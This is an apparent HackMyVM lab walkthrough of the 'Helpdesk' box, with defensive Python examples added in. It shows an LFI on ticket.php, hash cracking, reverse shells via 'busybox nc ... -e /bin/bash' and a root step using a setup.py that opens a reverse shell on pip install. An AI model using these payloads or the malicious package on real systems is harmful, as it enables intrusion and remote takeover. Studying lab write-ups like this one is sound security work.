HackMyVM-Helpdesk-Walkthrough
城南花已开

Information gathering

Service probing

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.153 08:00:27:e5:04:39 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fc:db:36 VMware, Inc.
^C
export ip=192.168.60.153
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.153:22
Open 192.168.60.153:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 12:08 CST
Initiating ARP Ping Scan at 12:08
Scanning 192.168.60.153 [1 port]
Completed ARP Ping Scan at 12:08, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:08
Completed Parallel DNS resolution of 1 host. at 12:08, 0.57s elapsed
DNS resolution of 1 IPs took 0.57s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:08
Scanning 192.168.60.153 [2 ports]
Discovered open port 22/tcp on 192.168.60.153
Discovered open port 80/tcp on 192.168.60.153
Completed SYN Stealth Scan at 12:08, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.153
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-08-24 12:08:45 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:E5:04:39 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.72 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.153
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 1290]
/login.php (Status: 200) [Size: 1819]
/javascript (Status: 301) [Size: 241] [--> http://192.168.60.153/javascript/]
/helpdesk (Status: 301) [Size: 239] [--> http://192.168.60.153/helpdesk/]
/ticket.php (Status: 200) [Size: 204]
/panel.php (Status: 302) [Size: 0] [--> login.php]
/debug.php (Status: 200) [Size: 250]

There is a debug.php page, and it leaks a set of test credentials: service_user:SuperSecretDev123!


But these credentials do not actually log in at login.php; a red herring 🤣

LFI (local file inclusion)

Note that the directory enumeration also turned up ticket.php; let's try requesting it

❯ curl $ip/ticket.php
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1>%

It looks like a ticket-viewing feature. Let's fuzz the parameter name, since it may be vulnerable to local file inclusion

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://$ip/ticket.php?FUZZ=../../../../../etc/passwd" --hw 28
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.153/ticket.php?FUZZ=../../../../../etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001200: 200 40 L 82 W 2135 Ch "url"
^C000005796: 200 4 L 28 W 204 Ch "invisible"

Total time: 0
Processed Requests: 5801
Filtered Requests: 5800
Requests/sec.: 0
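The fuzz above fires thousands of requests that differ only in the parameter name, every one carrying `../../` in the query string, which is exactly the kind of burst a defender can spot in the web server's access log. The following detector is an added example and not part of the walkthrough: it parses Apache combined-format lines (the sample lines are constructed to resemble the ticket.php requests above), URL-decodes the request path and flags traversal sequences and PHP stream-wrapper prefixes; the pattern lists are my assumptions about what is worth flagging.

```python
"""Spot directory-traversal and PHP stream-wrapper probes in web access logs.

Added example; it is not part of the walkthrough. The log lines are constructed
in Apache combined format to resemble the ticket.php requests made above, and
the pattern lists are assumptions about what a reviewer would want flagged.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: three probes from one source, two benign requests from another.
SAMPLE_LOG = """\
192.168.60.100 - - [24/Aug/2025:12:10:01 +0800] "GET /ticket.php?url=../../../../../etc/passwd HTTP/1.1" 200 2135 "-" "curl/8.5.0"
192.168.60.100 - - [24/Aug/2025:12:10:02 +0800] "GET /ticket.php?url=php://filter/convert.base64-encode/resource=../../../../../etc/passwd HTTP/1.1" 200 5120 "-" "curl/8.5.0"
192.168.60.100 - - [24/Aug/2025:12:10:03 +0800] "GET /ticket.php?invisible=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 204 "-" "Wfuzz/3.1.0"
192.168.60.50 - - [24/Aug/2025:12:11:00 +0800] "GET /ticket.php?url=1042 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
192.168.60.50 - - [24/Aug/2025:12:11:05 +0800] "GET /index.php HTTP/1.1" 200 1290 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')            # ../ or ..\ after decoding
WRAPPER_RE = re.compile(r'(?i)\b(?:php|data|expect|phar|zip|glob|file)://')


def decode_path(raw):
    """URL-decode twice so that %2e%2e%2f and %252e%252e%252f both normalise."""
    return unquote(unquote(raw))


def classify(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m['path'])
    reasons = []
    if TRAVERSAL_RE.search(path):
        reasons.append('traversal')
    if WRAPPER_RE.search(path):
        reasons.append('stream-wrapper')
    return {'ip': m['ip'], 'ts': m['ts'], 'path': path,
            'status': int(m['status']), 'reasons': reasons}


def scan(log_text):
    """All lines that carry at least one suspicious indicator."""
    findings = (classify(line) for line in log_text.splitlines())
    return [f for f in findings if f and f['reasons']]


def per_source_counts(findings):
    """Probes per client IP; a burst from one IP is the fuzzing signature."""
    return dict(Counter(f['ip'] for f in findings))


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h['ip'], h['status'], ','.join(h['reasons']), h['path'])
    print(per_source_counts(hits))
```

Two details matter in practice: the decode step, because fuzzers and WAF-evasion tooling routinely percent-encode the dots and slashes, and the per-source count, because a single traversal request may be a typo while hundreds in a few seconds from one address is a scan.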

We have the parameter name, url; request it directly

This shows that a helpdesk user exists

❯ curl "$ip/ticket.php?url=../../../../../etc/passwd"
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
mrmidnight:x:1000:1000:MrMidnight:/home/mrmidnight:/bin/bash
mysql:x:110:110:MySQL Server,,,:/nonexistent:/bin/false
helpdesk:x:1001:1001::/home/helpdesk:/bin/bash
</pre>%

Try reading the file through a php:// stream filter

❯ curl "$ip/ticket.php?url=php://filter/convert.base64-encode/resource=../../../../../etc/passwd"
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre>[base64-encoded file content omitted]</pre>

See the following article

HackMyVM-Medusa-Walkthrough | Pepster’Blog

So just go LFI-to-RCE and grab a shell? It is not that simple, haha 😅

The page only echoes the file content back as text; the PHP inside it is never parsed or executed

<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre><?=`$_GET[0]`?>@C>==@C>==@C>==@C>==@C>==@</pre>
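What the output above tells us is that ticket.php takes a path (or a php:// wrapper URL) from the url parameter, reads it and echoes it. The fix is not to filter `../` but to stop accepting a path at all. The following is an added example, not the box's code: it assumes tickets are stored as `<id>.txt` files under one directory and that the request carries a ticket identifier. `vulnerable_read()` reproduces the broken pattern only so the two can be contrasted; `safe_read()` allow-lists the identifier and then checks containment after `realpath()`, which also catches a symlink planted inside the ticket directory.

```python
"""Safe ticket lookup: the fix for the ticket.php behaviour shown above.

Added example, not the box's code. It assumes tickets are stored as
<id>.txt files under one directory and that the request carries a ticket
identifier rather than a path; vulnerable_read() reproduces the broken
pattern only to contrast the two.
"""
import os
import re
import tempfile

TICKET_ID_RE = re.compile(r'^[A-Za-z0-9_-]{1,64}$')


def vulnerable_read(base_dir, url):
    # The broken pattern: untrusted input joined onto a base path and read.
    # '../' walks out of base_dir; in PHP, file_get_contents() would also
    # honour php:// and other wrappers here.
    with open(os.path.join(base_dir, url)) as f:
        return f.read()


def safe_read(base_dir, ticket_id):
    # 1. Allow-list the identifier: no '/', '\\', '.' or ':' can get in, so
    #    neither traversal sequences nor a 'scheme://' prefix survive.
    if not TICKET_ID_RE.match(ticket_id):
        raise ValueError('invalid ticket id')
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, ticket_id + '.txt'))
    # 2. Containment check after symlink resolution: a planted symlink inside
    #    the ticket directory must not point outside it either.
    if os.path.commonpath([base, target]) != base:
        raise ValueError('path escapes ticket directory')
    with open(target) as f:
        return f.read()


def demo():
    """Build a throwaway layout and exercise both readers; returns outcomes."""
    tickets = tempfile.mkdtemp(prefix='tickets-')
    outside = tempfile.mkdtemp(prefix='outside-')
    with open(os.path.join(tickets, '1042.txt'), 'w') as f:
        f.write('Printer on floor 2 jammed\n')
    secret = os.path.join(outside, 'secret.txt')
    with open(secret, 'w') as f:
        f.write('SECRET\n')
    # A symlink inside the ticket directory that points outside it.
    os.symlink(secret, os.path.join(tickets, 'link.txt'))

    results = {'safe_ok': safe_read(tickets, '1042')}
    # The same kind of traversal the walkthrough used, relative to the ticket directory.
    escape = os.path.join('..', os.path.basename(outside), 'secret.txt')
    results['vuln_escape'] = vulnerable_read(tickets, escape)
    for bad in (escape, 'php://filter/convert.base64-encode/resource=1042',
                '1042/../1042', 'link'):
        try:
            safe_read(tickets, bad)
            results[bad] = 'allowed'
        except ValueError as e:
            results[bad] = 'rejected: ' + str(e)
    return results


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key!r}: {value!r}')
```

The `'link'` case is the one worth remembering: it passes the identifier allow-list, so only the post-`realpath()` containment check stops it. Both checks are needed.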

Credential cracking

Use the LFI to read login.php

❯ curl "$ip/ticket.php?url=../../../../../var/www/html/login.php"
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre><?php
session_start();

// Enable PHP error display for debugging (remove in production)
ini_set('display_errors', 1);
error_reporting(E_ALL);

// Stored credentials
$stored_user = 'helpdesk';

// SHA-512 hash for password: ticketmaster
$stored_hash = '$6$ABC123$fLo2MacCV.XBQeRZtHWL2297q/fUBs/b8gOmvLGuiz7wDgl3MSWcOOSKnTbaNPoUMCmEpY1dlwuPKbAtIuoo6.';

// Handle login
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user = $_POST['username'] ?? '';
    $pass = $_POST['password'] ?? '';

    if ($user === $stored_user && crypt($pass, $stored_hash) === $stored_hash) {
        $_SESSION['auth'] = true;
        header("Location: panel.php");
        exit;
    } else {
        $error = "Invalid username or password.";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>HelpDesk Login</title>
    …………………………
</head>
<body>
    <div class="login-box">
        <h2>HelpDesk Admin Login</h2>
        <form method="POST">
            <input type="text" name="username" placeholder="Username" required><br>
            <input type="password" name="password" placeholder="Password" required><br>
            <button type="submit">Login</button>
        </form>
        <?php if (isset($error)) echo "<div class='error'>$error</div>"; ?>
    </div>
    <footer>&copy; 2025 HelpDesk Ticketing System</footer>
</body>
</html>

</pre>

The account is clearly hard-coded, so let's crack the hash

This yields the credentials helpdesk:ticketmaster

❯ vi hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ticketmaster (?)
1g 0:00:01:10 DONE (2025-08-24 12:34) 0.01422g/s 10965p/s 10965c/s 10965C/s timo32..tiago3
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Once logged in, commands can be executed


User privilege escalation

Listen on a port and catch a reverse shell

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from helpdesk-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/helpdesk~192.168.60.153_Linux_x86_64/2025_08_24-12_41_18-083.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@helpdesk:/var/www/html$

There is a socket file under /opt

www-data@helpdesk:/opt/helpdesk-socket$ ls -al
total 16
drwxr-xr-x 2 helpdesk helpdesk 4096 Aug 24 04:06 .
drwxr-xr-x 4 root root 4096 Aug 16 15:32 ..
-rwxr-xr-x 1 helpdesk helpdesk 158 Aug 16 15:32 handler.sh
srwxrwxrwx 1 helpdesk helpdesk 0 Aug 24 04:06 helpdesk.sock
-rw-r--r-- 1 root root 184 Aug 16 15:44 serve.sh

Connect to it with socat

Commands sent to the socket run as the helpdesk user, but only one command per connection

www-data@helpdesk:/opt/helpdesk-socket$ socat - unix-connect:helpdesk.sock
id
[HelpDesk Automation] Executing: id
uid=1001(helpdesk) gid=1001(helpdesk) groups=1001(helpdesk)
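The listing above shows why this works: helpdesk.sock is mode `srwxrwxrwx`, so any local account (here www-data) can connect, and the handler runs whatever text arrives as the socket owner. The following is an added example and not the box's handler.sh/serve.sh (the walkthrough does not show them): a least-privilege version of the same automation socket that creates the socket mode 0660 and maps a few keywords to fixed argv lists instead of executing the received string. `ALLOWED` and the request/response format are assumptions for the demo.

```python
"""Least-privilege version of a local automation socket.

Added example, not the box's handler.sh/serve.sh (which the walkthrough does
not show). Compared with what the listing above reveals, it changes two
things: the socket is created mode 0660 instead of 0777, and the server maps
a small set of keywords to fixed argv lists instead of executing the received
text. ALLOWED and the request/response format are assumptions for the demo.
"""
import os
import socket
import stat
import subprocess
import tempfile
import threading

# Keyword -> fixed argv. No shell is involved, so the client cannot add arguments.
ALLOWED = {
    'id': ['id'],
    'kernel': ['uname', '-s'],
}


def run_request(text):
    """Resolve one request line to a response; used by the server and testable alone."""
    keyword = text.strip()
    argv = ALLOWED.get(keyword)
    if argv is None:
        return f'[HelpDesk Automation] Rejected: {keyword!r} is not an allowed action\n'
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return f'[HelpDesk Automation] Executing: {keyword}\n{proc.stdout}'


def _handle(conn):
    try:
        data = conn.recv(1024).decode('utf-8', 'replace')
        conn.sendall(run_request(data).encode())
    finally:
        conn.close()


def _accept_loop(srv):
    while True:
        try:
            conn, _ = srv.accept()
        except OSError:        # listener closed
            return
        threading.Thread(target=_handle, args=(conn,), daemon=True).start()


def start_server(sock_path):
    """Bind the socket with owner/group access only (0660) and serve in a thread."""
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    old_umask = os.umask(0o117)        # 0777 & ~0117 == 0660
    try:
        srv.bind(sock_path)
    finally:
        os.umask(old_umask)
    srv.listen(5)
    threading.Thread(target=_accept_loop, args=(srv,), daemon=True).start()
    return srv


def socket_mode(sock_path):
    """Permission bits of the socket node, e.g. 0o660."""
    return stat.S_IMODE(os.stat(sock_path).st_mode)


def send(sock_path, text):
    """Client side: one request, then read until the server closes."""
    c = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    c.connect(sock_path)
    c.sendall(text.encode())
    c.shutdown(socket.SHUT_WR)
    chunks = []
    while True:
        b = c.recv(4096)
        if not b:
            break
        chunks.append(b)
    c.close()
    return b''.join(chunks).decode()


def demo():
    """Start a server on a temporary path, send one allowed and one rejected request."""
    path = os.path.join(tempfile.mkdtemp(), 'helpdesk.sock')
    srv = start_server(path)
    try:
        return {
            'mode': socket_mode(path),
            'id': send(path, 'id\n'),
            'rejected': send(path, '/bin/sh -c "cat /etc/shadow"\n'),
        }
    finally:
        srv.close()
        os.unlink(path)


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, '->', value if isinstance(value, str) else oct(value))
```

Group membership on the socket directory then decides who may submit requests; www-data would need to be added to the helpdesk group deliberately rather than getting access by default. Note that permission bits on the socket node are honoured by Linux but not by every Unix, which is the other reason to keep the allow-list even when the mode is tightened.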

Spawn another reverse shell, this time as helpdesk

Root privilege escalation

The user has a sudo rule that allows running pip3

www-data@helpdesk:/opt/helpdesk-socket$ socat - unix-connect:helpdesk.sock
busybox nc 192.168.60.100 4444 -e /bin/bash
[HelpDesk Automation] Executing: busybox nc 192.168.60.100 4444 -e /bin/bash
[+] Got reverse shell from helpdesk-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <2>
(Penelope)─(Session [1])> interact 2
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/helpdesk~192.168.60.153_Linux_x86_64/2025_08_24-12_46_57-819.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
helpdesk@helpdesk:/$ cd ~
helpdesk@helpdesk:~$ cat user.txt
flag{ticket_approved_by_thedesk}
helpdesk@helpdesk:~$ sudo -l
Matching Defaults entries for helpdesk on helpdesk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User helpdesk may run the following commands on helpdesk:
(ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *

Here I simply had GPT produce the malicious script

from setuptools import setup
import os

# --- malicious code begins ---
# Run a system command during installation
try:
    os.system("busybox nc 192.168.60.100 4444 -e /bin/bash")
except Exception as e:
    print(f"Malicious code execution failed: {e}")
# --- malicious code ends ---

setup(
    name='very-innocent-package',
    version='0.0.1',
    description='A seemingly harmless package.',
    long_description='This package demonstrates a potential supply chain attack.',
    url='https://example.com/not-malicious',
    author='Attacker',
    author_email='attacker@example.com',
    keywords='example, security, test',
    packages=[],  # a malicious package usually needs no real functional code
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
    ],
    # entry_points could also be added here to hide the malicious behaviour,
    # but running it at the top level of setup.py is usually more direct.
)

Save this as setup.py in any directory; I created an exp folder for it

helpdesk@helpdesk:~$ mkdir exp
helpdesk@helpdesk:~$ mv setup.py exp
helpdesk@helpdesk:~$ sudo /usr/bin/pip3 install --break-system-packages ./exp
Processing ./exp
[+] Got reverse shell from helpdesk-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <3>
(Penelope)─(Session [2])> interact 3
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [3], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/helpdesk~192.168.60.153_Linux_x86_64/2025_08_24-12_57_24-374.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@helpdesk:/home/helpdesk/exp# cd ~
root@helpdesk:~# cat root.txt
flag{request_has_been_escalated}
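The root step works because `pip3 install <dir>` executes setup.py as the invoking user, and the sudo rule's trailing wildcard accepts a local directory as readily as a package name. The following is an added example, not part of the walkthrough: a pre-install audit that parses a package's setup.py with the `ast` module and reports module-level calls that spawn processes or evaluate code, plus any `cmdclass=` argument to `setup()` (a custom install hook is the other common place for install-time code). The `SUSPICIOUS_*` sets and the three constructed sample sources are assumptions for the demo; the module-level sample deliberately mirrors the shape of the setup.py above with a harmless command.

```python
"""Pre-install audit of a source package directory.

Added example, not part of the walkthrough. A 'sudo pip3 install <dir>' runs
setup.py as root, so anything at module level executes before setup() is even
called. This scanner walks the setup.py AST and reports (a) calls that spawn
processes or evaluate code and (b) a cmdclass= argument to setup(), which
installs a custom install/build hook. The SUSPICIOUS sets and the constructed
sample sources below are assumptions for the demo.
"""
import ast
import os

SUSPICIOUS_CALLS = {
    ('os', 'system'), ('os', 'popen'), ('os', 'execv'), ('os', 'execvp'),
    ('subprocess', 'run'), ('subprocess', 'Popen'), ('subprocess', 'call'),
    ('subprocess', 'check_call'), ('subprocess', 'check_output'),
    ('socket', 'socket'),
}
SUSPICIOUS_BUILTINS = {'eval', 'exec', '__import__', 'compile'}


def _call_name(node):
    """('os', 'system') for os.system(...), ('eval',) for eval(...), else None."""
    f = node.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return (f.value.id, f.attr)
    if isinstance(f, ast.Name):
        return (f.id,)
    return None


def audit_setup_source(source):
    """Return sorted (lineno, description) findings for one setup.py text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name is None:
            continue
        if name in SUSPICIOUS_CALLS or (len(name) == 1 and name[0] in SUSPICIOUS_BUILTINS):
            findings.append((node.lineno, '.'.join(name) + '()'))
        elif name == ('setup',):
            for kw in node.keywords:
                if kw.arg == 'cmdclass':
                    findings.append((node.lineno, 'setup(cmdclass=...) custom install hook'))
    return sorted(findings)


def audit_package_dir(path):
    """Audit <path>/setup.py; a missing file is reported rather than silently passed."""
    setup_py = os.path.join(path, 'setup.py')
    if not os.path.isfile(setup_py):
        return [(0, 'no setup.py (pyproject-only packages need a separate check)')]
    with open(setup_py, encoding='utf-8') as f:
        return audit_setup_source(f.read())


# Constructed samples.
CLEAN_SETUP = '''\
from setuptools import setup
setup(name="tidy-package", version="0.0.1", packages=["tidy"])
'''

MODULE_LEVEL_SETUP = '''\
from setuptools import setup
import os
try:
    os.system("id > /tmp/who-ran-me")
except Exception as e:
    print(e)
setup(name="very-innocent-package", version="0.0.1", packages=[])
'''

CMDCLASS_SETUP = '''\
from setuptools import setup
from setuptools.command.install import install
class Hook(install):
    def run(self):
        import subprocess
        subprocess.run(["id"])
        install.run(self)
setup(name="pkg", version="0.1", cmdclass={"install": Hook})
'''

if __name__ == '__main__':
    for label, src in (('clean', CLEAN_SETUP), ('module-level', MODULE_LEVEL_SETUP),
                       ('cmdclass', CMDCLASS_SETUP)):
        print(label, audit_setup_source(src))
```

A static check like this is a compensating control only. Obfuscated code, a `pyproject.toml` build backend or a binary wheel all sidestep it, and the sudo rule `(ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *` is itself the finding: a package installer that runs arbitrary build code can never be a safe sudo target, whatever its arguments.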

Afterword

The box's implementation code

root@helpdesk:~# cat cleanup.sh
#!/bin/bash

# Reset hash
HASHED=$(openssl passwd -6 -salt ABC123 'ticket1234')
usermod -p "$HASHED" helpdesk

# Reset dev server
systemctl restart devserver

# Reset pip path
rm -f /tmp/*
rm -rf /tmp/*

echo "[+] CTF Reset Complete"
root@helpdesk:~# systemctl status devserver
● devserver.service - Internal Dev Service
Loaded: loaded (/etc/systemd/system/devserver.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-08-24 04:06:23 UTC; 53min ago
Main PID: 702 (python3)
Tasks: 1 (limit: 7124)
Memory: 17.9M (peak: 18.2M)
CPU: 724ms
CGroup: /system.slice/devserver.service
└─702 /usr/bin/python3 /opt/dev_server/server.py

Aug 24 04:06:23 helpdesk systemd[1]: Started devserver.service - Internal Dev Service.
root@helpdesk:~# cat /etc/systemd/system/devserver.service
[Unit]
Description=Internal Dev Service

[Service]
ExecStart=/usr/bin/python3 /opt/dev_server/server.py
Restart=always

[Install]
WantedBy=multi-user.target
root@helpdesk:~# cat /opt/dev_server/server.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"Internal Dev API - v0.2\n")
            self.wfile.write(b"For authorized service use only.\n")

        elif self.path == "/dump":
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"[DEV DEBUG] Username: helpdesk\n")
            self.wfile.write(b"[DEV DEBUG] Hash: $6$rounds=10000$ABC123$8TZKHwbjkGZ.LfK/...REDACTED...\n")

        else:
            self.send_response(404)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"404 - Not Found\n")

if __name__ == "__main__":
    print("Starting internal dev server on 127.0.0.1:8000...")
    httpd = HTTPServer(('127.0.0.1', 8000), Handler)
    httpd.serve_forever()